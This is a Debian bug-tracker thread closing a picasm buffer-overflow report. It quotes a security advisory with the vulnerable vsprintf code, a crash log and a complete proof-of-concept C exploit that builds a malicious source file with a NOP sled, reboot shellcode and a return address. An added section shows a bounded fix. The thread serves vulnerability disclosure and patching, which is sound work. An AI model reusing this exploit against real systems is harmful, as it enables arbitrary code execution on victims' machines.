Your message dated Mon, 23 May 2005 11:02:34 -0400
with message-id <[EMAIL PROTECTED]>
and subject line Bug#309982: fixed in picasm 1.12c-1
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 20 May 2005 22:43:16 +0000
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Moritz Muehlenhoff <[EMAIL PROTECTED]>
To: Debian Bug Tracking System <[EMAIL PROTECTED]>
Subject: Multiple buffer overflows in picasm
X-Mailer: reportbug 3.11
Date: Sat, 21 May 2005 00:43:06 +0200
X-Debbugs-Cc: [EMAIL PROTECTED]
Message-Id: <[EMAIL PROTECTED]>
Package: picasm
Severity: grave
Tags: security
Justification: user security hole
Multiple buffer overflows in picasm's code for generating error messages
have been found that can be exploited through crafted source code with
overly long preprocessor directives. For full details please see this
advisory by Shaun Colley, for which I could not find an online reference:
Cheers,
Moritz
picasm error handling stack overflow vulnerability
Name: picasm error handling stack overflow
Versions Affected: picasm <= 1.12b
Severity: Medium/High
Impact: Arbitrary code execution
Maintainer's Website: <http://www.co.jyu.fi/~trossi>
Author: Shaun Colley
Vendor Notified: May 7th 2005
Public Disclosure: May 20th 2005
BACKGROUND
**************
picasm is a Microchip PIC16Cxx assembler, designed to run on most
UNIX-like operating systems. picasm now extends support to several
other PICs, including the 12c508 and 12c509 devices.
picasm is available via the FreeBSD ports system as devel/picasm. The
maintainer, Timo Rossi, also provides it on his microcontroller web
page <http://www.co.jyu.fi/~trossi/pic>.
DETAILS
********
When generating error and warning messages, picasm copies strings into
fixed length buffers without bounds checking. Below is the
responsible code.
---
void
warning(char *fmt, ...)
{
    char outbuf[128];
    va_list args;
    err_line_ref();
    strcpy(outbuf, "Warning: ");
    va_start(args, fmt);
    vsprintf(outbuf+9, fmt, args);    /* [1] */
    ...
void
error(int lskip, char *fmt, ...)
{
    va_list args;
    char outbuf[128];
    err_line_ref();
    strcpy(outbuf, "Error: ");
    va_start(args, fmt);
    vsprintf(outbuf+7, fmt, args);    /* [2] */
    ...
void
fatal_error(char *fmt, ...)
{
    va_list args;
    char outbuf[128];
    err_line_ref();
    strcpy(outbuf, "Fatal error: ");
    va_start(args, fmt);
    vsprintf(outbuf+13, fmt, args);   /* [3] */
    ...
}
---
At [1], [2] and [3], the error handling routines call vsprintf() to
copy a passed format string into a fixed length buffer. If the 'fmt'
function argument could be controlled, a stack overflow could occur.
As the author explains in the documentation, picasm supports an
'error' directive similar to NASM's '%error' preprocessor.
...
error <error_message> Causes an assembly error.
...
An overly long <error_message> provided to an 'error' directive in a
source file would cause calling of error() and result in a stack
overflow as seen in [2].
If an attacker could trick a user into assembling a source file with a
malformed 'error' directive, arbitrary code could be executed with the
privileges of the user. This could result in full system compromise.
There may be other attack vectors, such as causing picasm to generate
a long warning message, but this has not been investigated.
EXPLOITATION
**************
An attacker who can convince a user to assemble a malformed source
file can execute arbitrary code with the privileges of the user.
Exploitation is straightforward. The log below shows sample exploitation.
---
bash-3.00# echo `perl -e 'print "error " . "a"x2000'` > test.asm
bash-3.00# picasm test.asm
test.asm:1:
error
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Error:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Segmentation fault (core dumped)
bash-3.00# gdb -q -c picasm.core
Core was generated by `picasm'.
Program terminated with signal 11, Segmentation fault.
#0 0x61616161 in ?? ()
(gdb) quit
bash-3.00#
---
A proof-of-concept exploit has been written and successfully tested
using the picasm (v1.12b) port on FreeBSD 5.3-RELEASE. The exploit
crafts a file with a malformed 'error' directive which causes
execution to be directed to reboot() shellcode upon overflow.
---
/* picasm_exploit.c - by Shaun Colley <shaun rsc cx>
 *
 * This code generates a picasm source file with a malformed 'error' directive,
 * which exploits a stack overflow vulnerability in picasm's error printing
 * routines. The file generated by this exploit will only cause execution
 * of FreeBSD 'reboot()' shellcode. Exploit has been tested on
 * FreeBSD 5.3-RELEASE.
 * Return address into shellcode may need changing on other operating system
 * versions. Other shellcodes can potentially be used instead of the
 * one below.
 *
 * A fix has been provided by picasm's maintainer. The fixed packages can be
 * found at <http://www.co.jyu.fi/~trossi/pic/picasm112c.tar.gz>.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset(), memcpy() */
/* FreeBSD reboot shellcode by zillion
 * zillion safemode org */
char shellcode[] =
"\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80";
int main(int argc, char *argv[]) {
    if(argc < 2) {
        printf("syntax: %s <outfile>\n", argv[0]);
        return 1;
    }
    char buf[144];
    /* FreeBSD 5.3-RELEASE */
    char ret[] = "\x78\xea\xbf\xbf";
    /* Works when X server is not running */
    /*char ret[] = "\x08\xeb\xbf\xbf";*/
    char *ptr;
    FILE *fp;
    ptr = buf;
    /* Craft payload */
    memset(ptr, 0, sizeof(buf));
    memset(ptr, 0x90, 118); /* 118 NOP bytes */
    memcpy(ptr+118, shellcode, sizeof(shellcode)); /* 15 byte shellcode */
    memcpy(ptr+133, ret, 4); /* 4 byte ret address */
    /* Open outfile */
    if((fp = fopen(argv[1], "w")) == NULL) {
        printf("unable to open %s\n", argv[1]);
        exit(1);
    }
    /* Write it all to outfile */
    fwrite("error ", 1, 6, fp);
    fprintf(fp, "%s", buf);
    fclose(fp);
    return 0;
}
---
(If the code looks distorted, reference
<http://www.demodulated.net/code/picasm_exploit.c>)
FIX INFORMATION
*****************
The maintainer, Timo Rossi, has fixed the picasm packages and provided
a new security release, picasm 1.12c. The fixed packages are
available from <http://www.co.jyu.fi/~trossi/pic/picasm112c.tar.gz>.
Thanks to Timo Rossi for his cooperation in fixing the issue.
-- System Information:
Debian Release: 3.1
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.11
Locale: LANG=C, [EMAIL PROTECTED] (charmap=ISO-8859-15)
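Added here as an example, not code from the advisory or from picasm: the bounded form of the error() routine discussed in the DETAILS section, using vsnprintf() so that the 2000-character 'error' directive from the log above is truncated and reported rather than overrunning outbuf. The names format_diag, error_bounded and the two check functions are assumptions.

```c
/* Added example, not picasm's code: a bounded version of the advisory's
 * error(). vsprintf() into char outbuf[128] has no length limit; vsnprintf()
 * bounds the write to the space left and reports truncation to the caller. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#define OUTBUF_SIZE 128   /* same fixed buffer size as the advisory's code */
/* Formats "<prefix><message>" into out (capacity outsz), always
 * NUL-terminating. Returns 1 if the message fit, 0 if it was truncated. */
static int format_diag(char *out, size_t outsz, const char *prefix,
                       const char *fmt, va_list args)
{
    size_t plen = strlen(prefix);
    if (plen >= outsz) {               /* not even the prefix fits */
        if (outsz) out[0] = '\0';
        return 0;
    }
    memcpy(out, prefix, plen + 1);
    /* writes at most outsz - plen bytes, NUL included */
    int n = vsnprintf(out + plen, outsz - plen, fmt, args);
    return n >= 0 && (size_t)n < outsz - plen;
}
/* Bounded counterpart of the advisory's error(); hypothetical name. */
int error_bounded(char *out, size_t outsz, const char *fmt, ...)
{
    va_list args;
    va_start(args, fmt);
    int fit = format_diag(out, outsz, "Error: ", fmt, args);
    va_end(args);
    return fit;
}
/* A normal directive message fits and is prefixed as before. */
int short_message_fits(void)
{
    char outbuf[OUTBUF_SIZE];
    int fit = error_bounded(outbuf, sizeof outbuf, "%s", "bad opcode");
    return fit && strcmp(outbuf, "Error: bad opcode") == 0;
}
/* The advisory's test input, a 2000-character message, constructed here.
 * The text is passed via %s, so a '%' in source text is data, not a conversion. */
int long_message_is_truncated(void)
{
    char msg[2001], outbuf[OUTBUF_SIZE];
    memset(msg, 'a', 2000);
    msg[2000] = '\0';
    int fit = error_bounded(outbuf, sizeof outbuf, "%s", msg);
    return !fit && strlen(outbuf) == OUTBUF_SIZE - 1;
}
```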
---------------------------------------
Received: (at 309982-close) by bugs.debian.org; 23 May 2005 15:09:28 +0000
From: Ludovic Drolez <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.55 $
Subject: Bug#309982: fixed in picasm 1.12c-1
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Mon, 23 May 2005 11:02:34 -0400
Source: picasm
Source-Version: 1.12c-1
We believe that the bug you reported is fixed in the latest version of
picasm, which is due to be installed in the Debian FTP archive:
picasm_1.12c-1.diff.gz
to pool/main/p/picasm/picasm_1.12c-1.diff.gz
picasm_1.12c-1.dsc
to pool/main/p/picasm/picasm_1.12c-1.dsc
picasm_1.12c-1_i386.deb
to pool/main/p/picasm/picasm_1.12c-1_i386.deb
picasm_1.12c.orig.tar.gz
to pool/main/p/picasm/picasm_1.12c.orig.tar.gz
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Ludovic Drolez <[EMAIL PROTECTED]> (supplier of updated picasm package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Mon, 23 May 2005 12:35:49 +0200
Source: picasm
Binary: picasm
Architecture: source i386
Version: 1.12c-1
Distribution: unstable
Urgency: low
Maintainer: Ludovic Drolez <[EMAIL PROTECTED]>
Changed-By: Ludovic Drolez <[EMAIL PROTECTED]>
Description:
picasm - Assembler for the Microchip PIC-family Microcontrollers
Closes: 309982
Changes:
picasm (1.12c-1) unstable; urgency=low
.
* New upstream release which fixes some buffer overflows.
Closes: #309982
Files:
2c80602f573c8cce063e935df0a78523 558 otherosfs optional picasm_1.12c-1.dsc
38a4eb1a533bea197dfb8fc190837ac9 40717 otherosfs optional picasm_1.12c.orig.tar.gz
78f175dfe1fe728a354fe1d9474ce9d6 3390 otherosfs optional picasm_1.12c-1.diff.gz
7cb25d1b72f905a518cc646493c190dc 39546 otherosfs optional picasm_1.12c-1_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)
iD8DBQFCket5sRlQAP1GppgRAm1qAJ0YqjPRM98kSXtoEu6v7/kScW1USQCfYlb3
CiswCacDeDdKQkcBjT8089Y=
=cNa6
-----END PGP SIGNATURE-----